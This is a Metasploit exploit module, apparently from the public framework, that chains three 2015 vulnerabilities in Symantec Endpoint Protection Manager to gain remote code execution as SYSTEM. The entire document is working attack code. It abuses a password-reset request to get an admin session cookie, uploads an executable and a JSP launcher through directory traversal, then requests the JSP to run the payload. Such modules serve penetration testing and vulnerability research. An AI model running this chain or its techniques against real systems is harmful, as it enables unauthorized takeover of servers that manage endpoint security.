## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', #discovery 'bperry' # metasploit module ], 'References' => [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8443), OptString.new('TARGETURI', [true, 'The path of the web application', '/']), ]) end def exploit meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_post' => { 'ActionType' => 'ResetPassword', 'UserID' => 'admin', 'Domain' => '' } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies if cookie.nil? || cookie.empty? fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe", 'KnownHosts' => '.' }, 'data' => payload.encoded_exe, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp", 'KnownHosts' => '.' }, 'data' => exec, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") print_status("Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) end end